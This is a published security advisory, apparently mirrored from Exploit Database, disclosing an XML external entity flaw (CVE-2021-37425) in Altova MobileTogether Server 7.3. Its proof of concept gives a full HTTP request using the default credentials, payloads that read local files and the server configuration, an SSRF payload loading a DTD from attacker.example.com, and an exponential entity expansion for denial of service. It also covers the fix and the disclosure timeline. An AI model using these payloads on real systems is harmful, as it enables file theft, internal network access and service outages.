Altova MobileTogether Server 7.3 – XML External Entity Injection (XXE)

• Exploit Database
• 23 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2021-08-12
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50191/

• # Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
  # Date: 2021-08-10
  # Exploit Author: RedTeam Pentesting GmbH
  # Vendor Homepage: https://www.altova.com/mobiletogether-server
  # Version: 7.3
  # CVE: 2021-37425
  
  Advisory: XML External Entity Expansion in MobileTogether Server
  
  RedTeam Pentesting discovered a vulnerability in the MobileTogether
  server which allows users with access to at least one app to read
  arbitrary, non-binary files from the file system and perform server-side
  requests. The vulnerability can also be used to deny availability of the
  system. As an example, this advisory shows the compromise of the
  server's certificate and private key.
  
  
  Details
  =======
  
  Product: MobileTogether Server
  Affected Versions: 7.0-7.3, potentially earlier versions as well
  Fixed Versions: 7.3 SP1
  Vulnerability Type: XML External and Exponential Entity Expansion
  Security Risk: medium
  Vendor URL: https://www.altova.com/mobiletogether-server
  Vendor Status: fixed version released
  Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
  Advisory Status: published
  CVE: CVE-2021-37425
  CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
  
  
  Introduction
  ============
  
  "MobileTogether Server is the processing powerhouse for your native iOS,
  Android, Windows, and browser-based apps.
  
  MobileTogether Server is the back-end hub for your solutions and acts as
  a gateway between end-users and your back-end data sources and
  infrastructure."
  
  (from the vendor's homepage)
  
  
  More Details
  ============
  
  MobileTogether Server is a back-end application hosting developed apps
  and provide access to various platforms and devices. Access to these
  apps is possible via native applications for devices and operating
  systems or directly via the browser. To access the MobileTogether
  server, depending on configuration either an anonymous login is possible
  or credentials are required.
  
  During analysis of the communication between a MobileTogether client
  application on a smartphone and the MobileTogether Server, HTTP requests
  were observed containing JSON as well as XML data. Generally, the XML
  data is used to signal changes in the UI or user-supplied input for the
  app hosted in MobileTogether Server.
  
  It was found that user-supplied XML external entities included in the
  described HTTP requests are resolved by the MobileTogether Server and
  the result is reflected in an HTTP response.
  
  This behaviour allows to read local files, perform server-side requests
  and also deny the availability of the service through XML exponential
  entity expansion. However, file disclosure is limited to non-binary
  files and the absolute path needs to be known in advance.
  
  
  Proof of Concept
  ================
  
  MobileTogether Server comes with a series of example applications. To
  exploit the vulnerability, access to at least one application is
  required. In the following, the app EuroFXrates and the default user
  root with the default password root is used for demonstration of the
  vulnerability.
  
  The following HTTP request contains the minimal data required to be
  accepted by the server resulting in the processing of the XML data
  stored within the JSON field InfoSetChanges/Changes (formatted for
  better readability):
  
  ------------------------------------------------------------------------
  POST /workflowmanagement HTTP/1.1
  Authorization: Basic cm9vdDpyb290
  Content-Type: application/json
  Content-Length: 851
  Host: 192.168.1.1:8085
  Connection: close
  
  {
  "DeviceY": 0,
  "ClientVersionName": "7.2.2",
  "MobileManufacturer": "",
  "AllInfosetsSerialized": true,
  "ServerName": "192.168.1.1",
  "ProtocolVersionMax": "2",
  "Language": "en-US",
  "DeviceType": "",
  "ClientKey": "1_11148009037086584903_2744738433663963458",
  "DeviceXDPI": 0,
  "DeviceYDPI": 0,
  "DeviceYCanvasWithTabs": 0,
  "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
  "ProtocolVersionMin": "2",
  "DeviceXCanvas": 0,
  "ClientArchiveVersionMin": "-74",
  "MobileOSVersion": "Android 11",
  "DeviceXCanvasWithTabs": 0,
  "ClientArchiveVersionMax": "65",
  "User": "root",
  "DeviceX": 0,
  "DesignFileName": "/public/EuroFXrates",
  "EncValue": "M9EBc6-7P5cd0",
  "DeviceYCanvas": 0,
  "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
  "InfosetChanges": [
  {
  "Changes": [
  {
  "": "<?xml version=\"1.0\" encoding=\"utf-8\"?>
   <Root>
   <SkipIntro>false</SkipIntro>
   </Root>"
  }
  ],
  "ID": "$$PERS$$"
  }
  ],
  "DeviceIsPortrait": true
  }
  ------------------------------------------------------------------------
  
  With the following XML data it can be verified that XML entities are
  resolved and reflected within predefined XML tags in the HTTP response:
  
  ------------------------------------------------------------------------
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE Root [
  <!ENTITY redteam "RedTeam Pentesting">
  ]>
  <Root>
  <RedTeam>&redteam;</RedTeam>
  </Root>
  ------------------------------------------------------------------------
  
  The HTTP response contains the resolved XML entity:
  
  ------------------------------------------------------------------------
  HTTP/1.1 200 OK
  Content-Type: text/html;charset=utf-8
  Server: CherryPy/18.1.0
  [...]
  
  [...]
  <?xml version=\"1.0\" encoding=\"utf-8\"?>
  <Root>
  <RedTeam>RedTeam Pentesting</RedTeam>
  [...]
  ------------------------------------------------------------------------
  
  The following example shows how local files can be read from the server
  system hosting the MobileTogether Server on a Windows system:
  
  ------------------------------------------------------------------------
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE Root [
  <!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
  ]>
  <Root>
  <RedTeam>&redteam;</RedTeam>
  </Root>
  ------------------------------------------------------------------------
  
  The content of the file is shown below and formatted for better
  readability:
  
  ------------------------------------------------------------------------
  HTTP/1.1 200 OK
  Content-Type: text/html;charset=utf-8
  Server: CherryPy/18.1.0
  [...]
  
  [...]
  <?xml version=\"1.0\" encoding=\"utf-8\"?>
  <Root>
  <RedTeam>
  ; for 16-bit app support
  [fonts]
  [extensions]
  [mci extensions]
  [files]
  [Mail]
  MAPI=1
  </RedTeam>
  [...]
  ------------------------------------------------------------------------
  
  One interesting target for attackers could be the configuration file for
  the MobileTogether Server residing at the following fixed location:
  
  ------------------------------------------------------------------------
  C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
  ------------------------------------------------------------------------
  
  For example, if the server supports HTTPS, the absolute path to the
  server's certificate and private key is stored in its configuration.
  
  Furthermore, external XML entities can be used to access third-party
  websites as well as web services that are only available internally.
  Together with an externally hosted XML DTD, response information can be
  extracted:
  
  ------------------------------------------------------------------------
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE root [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % content SYSTEM "http://internal.example.com">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]>
  <Root>
  <RedTeam>&redteam;</RedTeam>
  </Root>
  ------------------------------------------------------------------------
  
  The DTD contains the following information:
  
  ------------------------------------------------------------------------
  <!ENTITY redteam "%start;%content;%end;">
  ------------------------------------------------------------------------
  
  In the HTTP response, the HTML markup delivered by internal.example.com
  is now visible.
  
  A further vulnerability attacks the availability of the service through
  XML exponential entity expansion. This is demonstrated with the
  following XML document:
  
  ------------------------------------------------------------------------
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE root [
  <!ENTITY redteam0 "RedTeam Pentesting">
  <!ENTITY redteam1 "&redteam0; &redteam0;">
  <!ENTITY redteam2 "&redteam1; &redteam1;">
  <!ENTITY redteam3 "&redteam2; &redteam2;">
  <!ENTITY redteam4 "&redteam3; &redteam3;">
  <!ENTITY redteam5 "&redteam4; &redteam4;">
  <!ENTITY redteam6 "&redteam5; &redteam5;">
  <!ENTITY redteam7 "&redteam6; &redteam6;">
  <!ENTITY redteam8 "&redteam7; &redteam7;">
  <!ENTITY redteam9 "&redteam8; &redteam8;">
  <!ENTITY redteam10 "&redteam9; &redteam9;">
  <!ENTITY redteam11 "&redteam10; &redteam10;">
  <!ENTITY redteam12 "&redteam11; &redteam11;">
  <!ENTITY redteam13 "&redteam12; &redteam12;">
  <!ENTITY redteam14 "&redteam13; &redteam13;">
  <!ENTITY redteam15 "&redteam14; &redteam14;">
  <!ENTITY redteam16 "&redteam15; &redteam15;">
  <!ENTITY redteam17 "&redteam16; &redteam16;">
  <!ENTITY redteam18 "&redteam17; &redteam17;">
  <!ENTITY redteam19 "&redteam18; &redteam18;">
  <!ENTITY redteam20 "&redteam19; &redteam19;">
  ]>
  <Root>
  <RedTeam>&redteam20;</RedTeam>
  </Root>
  ------------------------------------------------------------------------
  
  Sending the shown XML document leads to a huge server-side resource
  allocation which ultimately disrupts the availability of the
  MobileTogether Server.
  
  
  Workaround
  ==========
  
  None known.
  
  
  Fix
  ===
  
  According to the vendor, upgrading to version 7.3 SP1 resolves the
  vulnerability.
  
  
  Security Risk
  =============
  
  Attackers in possession of an account for a MobileTogether Server with
  access to at least one app are able to read files from the server
  system, conduct HTTP requests to external and internal systems and can
  also deny the availability of the service. Access might also be possible
  through default credentials or the anonymous user.
  
  
  Timeline
  ========
  
  2021-06-21 Vulnerability identified
  2021-06-23 Requested a security contact from vendor
  2021-06-25 Security contact established with vendor
  2021-07-05 Customer approved disclosure to vendor
  2021-07-05 Vendor notified
  2021-07-20 Vendor acknowledged vulnerability
  2021-07-22 CVE ID requested
  2021-07-23 CVE ID assigned
  2021-07-28 Vendor released fixed version
  2021-08-10 Advisory released
  
  
  RedTeam Pentesting GmbH
  =======================
  
  RedTeam Pentesting offers individual penetration tests performed by a
  team of specialised IT-security experts. Hereby, security weaknesses in
  company networks or products are uncovered and can be fixed immediately.
  
  As there are only few experts in this field, RedTeam Pentesting wants to
  share its knowledge and enhance the public knowledge with research in
  security-related areas. The results are made available as public
  security advisories.
  
  More information about RedTeam Pentesting can be found at:
  https://www.redteam-pentesting.de/
  
  
  Working at RedTeam Pentesting
  =============================
  
  RedTeam Pentesting is looking for penetration testers to join our team
  in Aachen, Germany. If you are interested please visit:
  https://www.redteam-pentesting.de/jobs/
  
  -- 
  RedTeam Pentesting GmbH Tel.: +49 241 510081-0
  Dennewartstr. 25-27 Fax : +49 241 510081-99
  52068 Aachenhttps://www.redteam-pentesting.de
  Germany Registergericht: Aachen HRB 14004
  Geschäftsführer: Patrick Hof, Jens Liebchen